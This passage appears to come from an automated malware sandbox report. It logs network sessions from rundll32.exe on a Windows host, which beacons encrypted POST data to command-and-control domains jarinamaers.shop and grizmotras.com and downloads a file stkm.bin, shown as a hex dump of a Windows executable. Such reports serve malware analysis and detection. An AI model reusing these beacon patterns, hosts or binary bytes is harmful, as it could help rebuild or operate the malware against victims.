                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 252
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:16:51 UTC252OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 35 36 32 70 61 56 5a 46 31 69 49 71 6f 42 79 56 44 48 79 55 57 63 55 32 7a 42 63 4f 69 31 7a 42 79 62 36 72 2f 4d 44 48 30 72 73 46 53 4d 70 38 6d 5a 54 76 79 4a 37 32 6f 73 51 64 79 4b 61 78 67 4d 75 47 52 65 66 73 57 4f 52 35 52 4d 53 46 4f 4a 6a 46 51 42 67 51 53 59 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWcU2zBcOi1zByb6r/MDH0rsFSMp8mZTvyJ72osQdyKaxgMuGRefsWOR5RMSFOJjFQBgQSYk=
                                                                                                2024-04-26 21:16:58 UTC584INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:16:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBBfu%2BC%2BI3Gqty1j4yr1v%2B4%2BtPJLu%2BNms76%2BheuVeV56HimXkCHmLxzllOqwct3YHpOKsYZHrz2%2F6Ym5bfAQ3O%2FJW9IYINLScMVBw5j5py2v2g%2FW9FqPIM92QpZWZeOq8ZXd"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a998a86810a570-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:16:58 UTC26INData Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a
                                                                                                Data Ascii: 14QhOmMB2npTVqDJOocQ==
                                                                                                2024-04-26 21:16:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.2.549746104.21.46.75443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:01 UTC229OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 184
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:01 UTC184OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 35 36 32 70 61 56 5a 46 31 69 49 71 6f 42 79 56 44 48 79 55 57 51 3d 3d
                                                                                                Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWQ==
                                                                                                2024-04-26 21:17:04 UTC570INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0U3HQjQwUVdJkBoPjJBqyUy6A70OzW51ZVkwm0kixsm2eVSYHeI0ZvxNQL4IuX4gO47MtyTbXU9NUD26poQuSlt7cnFV6UHkPsAO9p%2BKb1CP0nTEfeWsji5mEyfTYq7dkY%2FB"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a998e2fef7a4ca-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.2.549747104.21.46.75443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:05 UTC229OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 184
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:05 UTC184OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 35 36 32 70 61 56 5a 46 31 69 49 71 6f 42 79 56 44 48 79 55 57 51 3d 3d
                                                                                                Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWQ==
                                                                                                2024-04-26 21:17:13 UTC568INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=swQ5OaFvSHOpF6LjKfOQMxJWFPAjP8YpO4VuRrv3vYQLQ6csJzM0fjj2OdvFTuBHyogzVuaz652Sf4NjaOROL%2Fu3k6LAgOqxtDypJCFt0lyGCtGMXVWL3SMVHJdD3nVHek0z"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a998fd2d18a552-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.2.549748104.21.46.75443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:13 UTC229OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 184
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:13 UTC184OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 35 36 32 70 61 56 5a 46 31 69 49 71 6f 42 79 56 44 48 79 55 57 51 3d 3d
                                                                                                Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWQ==
                                                                                                2024-04-26 21:17:20 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZsbWzna2ISWo4fyaS%2F2pn4uADEc11mInBrBkc04L6HRnh3DRFCuaglnv%2F7OeAU4cqmK%2BVmr4ZXYmHgNfU%2FKJq8tXflZFn0nYbTZAsKijOM2cTN0reEr9Kc%2FIlBkpE%2BbhMeCl"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999327febd9bd-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:20 UTC198INData Raw: 63 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 69 7a 64 35 5a 48 39 71 74 56 32 58 35 45 38 74 46 4a 69 39 2b 4d 6e 69 58 44 36 41 4a 55 75 7a 5a 4f 2b 2b 42 47 72 63 6e 47 68 59 31 6f 61 41 77 34 69 6e 4d 67 6c 59 33 54 45 67 76 42 75 42 55 44 75 49 58 59 67 32 67 78 5a 61 67 44 4c 78 0d 0a
                                                                                                Data Ascii: c0QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnGhY1oaAw4inMglY3TEgvBuBUDuIXYg2gxZagDLx
                                                                                                2024-04-26 21:17:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                26192.168.2.549749104.21.46.75443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:20 UTC129OUTGET /files/stkm.bin HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                2024-04-26 21:17:21 UTC716INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:21 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 857600
                                                                                                Connection: close
                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                Cache-Control: max-age=14400
                                                                                                CF-Cache-Status: EXPIRED
                                                                                                Last-Modified: Fri, 26 Apr 2024 17:35:13 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOetRzzh2BEiqmdkNc3Tcy1e2ZcvP1rHf44m6VeYwM7G3E0XHqgYKSnZHzv0AqCwjrHOpBEzdYJV6MU41nHs09AcXXUWBZzfzqUN0gxGkKFDEfL3fFZ4BrP4HuIacZv%2BAqCk"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9995c3ef025a0-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:21 UTC653INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                                                Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 00 60 00 00 00 70 0c 00 00 60 00 00 00 70 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 00 10 00 00 00 d0 0c 00 00 10 00 00 00 d0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 10 00 00 00 e0 0c 00 00 10 00 00 00 e0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 20 00 00 00 f0 0c 00 00 20 00 00 00 f0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: ``@.pdata`p`p@@.gfids@@.rsrc@@.reloc @B
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d 05 23 46 0c 00 48 89 85 98 00 00 00 48 8d 05 1d 46 0c 00 48 89 85 b0 00 00 00 48 8d 05 17 46 0c 00 48 89 85 c8 00 00 00 48 8d 05 11 46 0c 00 48 89 85 e0 00 00 00 48 8d 05 0b 46 0c 00 48 89 85 f8 00 00 00 c7 44 24 38 b5 08 65 b4 48 89 4c 24 40 c7 44 24 50 7b 0d 6b ca 48 89 4c 24 58 c7 44 24 68 50 4c c4 a5 48 89 4c 24 70 c7 45 80 74 35 13 31 48 89 4d 88 c7 45 98 27 a3 aa 05 48 89 4d a0 c7 45 b0 bc 3e 16 a4 48 89 4d b8 c7 45 c8 80 4b ee 9e 48 89 4d d0 c7 45 e0 f2 79 36 18 48 89 4d e8 c7 45 f8 46 1c 1c e2 48 89 4d 00 c7 45 10 39 99 87 e4 48 89 4d 18 c7 45 28 97 1a 2d 5c 48 89 4d 30 c7 45 40 ac 65 8e 5c 48 89 4d 48 c7 45 58 98 3b 45 e1 48 89 4d 60 c7 45 70 b5 81 f3 db 48 89 4d 78 c7 85 88
                                                                                                Data Ascii: ,FHEhH)FHH#FHHFHHFHHFHHFHD$8eHL$@D$P{kHL$XD$hPLHL$pEt51HME'HME>HMEKHMEy6HMEFHME9HME(-\HM0E@e\HMHEX;EHM`EpHMx
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 44 39 64 24 6c 74 0a ff c2 66 44 39 64 54 6c 75 f6 03 d2 48 8d 4c 24 6c e8 ee f7 ff ff 3b 46 f8 74 14 48 8d 54 24 40 48 8b cf ff 15 1b 44 0c 00 85 c0 75 c8 eb 0e 48 8d 4c 24 6c ff 15 e2 41 0c 00 48 8b d8 49 8b cf e8 3b 0c 00 00 eb 03 49 8b dc 48 8b 0e 48 89 19 48 85 db 74 18 41 ff c6 48 83 c6 10 41 83 fe 02 0f 82 e2 fe ff ff b8 01 00 00 00 eb 02 33 c0 4c 8d 9c 24 90 02 00 00 49 8b 5b 38 49 8b 73 40 49 8b 7b 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 d0 f8 ff ff 48 81 ec 30 08 00 00 48 8d 15 ab 43 0c 00 c7 44 24 20 4a 0d ce 09 48 8d 05 c4 40 0c 00 48 89 54 24 28 48 89 44 24 30 48 8d 05 bb 40 0c 00 48 89 44 24 48 48 8d 05 cf 40 0c 00 48 89 44 24 60 48 8d
                                                                                                Data Ascii: JDHHtJ&AfD9d$ltfD9dTluHL$l;FtHT$@HDuHL$lAHI;IHHHtAHA3L$I[8Is@I{HIA_A^A]A\]H\$H|$UH$H0HCD$ JH@HT$(HD$0H@HD$HH@HD$`H
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48 8d 05 a6 3d 0c 00 48 89 85 20 03 00 00 48 8d 05 c8 3c 0c 00 48 89 85 38 03 00 00 48 8d 05 92 3d 0c 00 48 89 85 50 03 00 00 48 8d 05 8c 3d 0c 00 48 89 85 68 03 00 00 48 8d 05 86 3d 0c 00 48 89 85 80 03 00 00 48 8d 05 80 3d 0c 00 48 89 85 98 03 00 00 48 8d 05 7a 3d 0c 00 48 89 85 b0 03 00 00 48 8d 05 74 3d 0c 00 48 89 85 c8 03 00 00 48 8d 05 6e 3d 0c 00 48 89 85 e0 03 00 00 48 8d 05 68 3d 0c 00 48 89 85 f8 03 00 00 48 8d 05 62 3d 0c 00 48 89 85 10 04 00 00 48 8d 05 5c 3d 0c 00 48 89 85 28 04 00 00 48 8d 05 5e 3d 0c 00 48 89 85 40 04 00 00 48 8d 05 48 3d 0c 00 48 89 85 58 04 00 00 48 8d 05 4a 3d 0c 00 48 89 85 70 04 00 00 48 8d 05 44 3d 0c 00 48 89 85 88 04 00 00 48 8d 05 3e 3d 0c 00 48 89 85 a0 04 00 00
                                                                                                Data Ascii: 'HH=H H<H8H=HPH=HhH=HH=HHz=HHt=HHn=HHh=HHb=HH\=H(H^=H@HH=HXHJ=HpHD=HH>=H
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3 81 48 89 95 20 07 00 00 48 8b 0b 45 33 c0 8b 53 f8 48 8b 09 e8 6e f3 ff ff 48 8b 4b 08 48 89 01 48 85 c0 74 10 ff c7 48 83 c3 18 83 ff 56 72 d8 b8 01 00 00 00 4c 8d 9c 24 30 08 00 00 49 8b 5b 10 49 8b 7b 18 49 8b e3 5d c3 cc 48 89 5c 24 10 57 48 83 ec 20 8b da 48 8b f9 48 85 c9 0f 84 f5 00 00 00 85 d2 0f 84 ed 00 00 00 44 8d 42 02 b8 ab aa aa aa 41 f7 e0 d1 ea 8d 0c 95 01 00 00 00 e8 6e 5f 08 00 4c 8b c0 48 85 c0 0f 84 c7 00 00 00 48 8b d0 85 db 0f 84 b4 00 00 00 48 8d 44 24 30 48 2b f8 4c 8d 1d 00 b4 0a 00 45 33 c9 48 8d 4c 24 30 45 8d 51 03 85 db 74 0c 8a 04 0f ff cb 41 ff c1 88 01 eb 03 c6 01 00 48 ff c1 49 83 ea 01 75 e4 0f b6 4c 24 30 48 83 c7 03 8b c1 83 e1 03 48 c1 e8 02 48 c1 e1 04 42 8a 04 18
                                                                                                Data Ascii: 'uHH HE3SHnHKHHtHVrL$0I[I{I]H\$WH HHDBAn_LHHHD$0H+LE3HL$0EQtAHIuL$0HHHB
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee 48 c1 e5 03 48 8b cd e8 8e 5a 08 00 48 8b f8 48 85 c0 74 c5 48 8b cd e8 7e 5a 08 00 48 8b e8 48 85 c0 75 0a 48 8b cf e8 ee c9 08 00 eb ab 48 8b 13 48 85 d2 74 30 48 83 7b 08 00 74 29 4c 8b 43 10 4d 85 c0 74 20 49 c1 e0 03 48 8b cf e8 10 2b 08 00 4c 8b 43 10 48 8b cd 48 8b 53 08 49 c1 e0 03 e8 fc 2a 08 00 48 8b 0b e8 ac c9 08 00 48 8b 4b 08 e8 a3 c9 08 00 33 c0 48 89 3b 48 89 6b 08 48 89 73 18 e9 53 ff ff ff cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 49 8b f0 48 8b ea 48 8b f9 33 db 48 85 ff 74 06 48 8b 47 10 eb 02 33 c0 48 3b d8 73 37 48 8b 07 48 8b 0c d8 48 83 c8 ff 48 ff c0 80 3c 01 00 75 f7 48 3b c6 75 0f 4c 8b c6 48 8b d5 e8 43 93 08 00 85 c0 74 05 48 ff c3 eb c1 48 8b 47 08 48
                                                                                                Data Ascii: _HytHtHHHZHHtH~ZHHuHHHt0H{t)LCMt IH+LCHHSI*HHK3H;HkHsSH\$Hl$Ht$WH IHH3HtHG3H;s7HHHH<uH;uLHCtHHGH
                                                                                                2024-04-26 21:17:21 UTC1369INData Raw: 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e 55 08 00 48 85 c0 0f 84 c8 00 00 00 c7 00 01 00 00 00 e9 b0 00 00 00 41 b8 04 00 00 00 48 8d 0d d5 0e 0b 00 e8 a0 8e 08 00 85 c0 75 24 48 83 07 04 8d 48 10 e8 08 55 08 00 48 85 c0 0f 84 92 00 00 00 c7 00 06 00 00 00 c7 40 08 01 00 00 00 eb 76 48 8b 17 48 8d 0d a6 0e 0b 00 41 b8 05 00 00 00 e8 63 8e 08 00 85 c0 75 6a 48 83 07 05 8d 48 10 e8 cb 54 08 00 48 85 c0 74 59 c7 00 06 00 00 00 89 58 08 eb 41 48 8d 56 01 48 8b cf e8 ff 01 00 00 eb 43 48 8b cf e8 3d 03 00 00 eb 39 48 8b cf e8 53 fe ff ff 48 8b f8 48 85 c0 74 26 b9 10 00 00 00 e8 89 54 08 00 48 85 c0 74 0f c7 00 02 00 00 00 48 89 78 08 48 8b d8 eb 08 48 8b cf e8 ed c3 08 00 48 8b c3 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc 48 8b c4 48
                                                                                                Data Ascii: HH>UHAHu$HHUH@vHHAcujHHTHtYXAHVHCH=9HSHHt&THtHxHHHH\$0Ht$8H _HH


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.2.549750172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:24 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:24 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
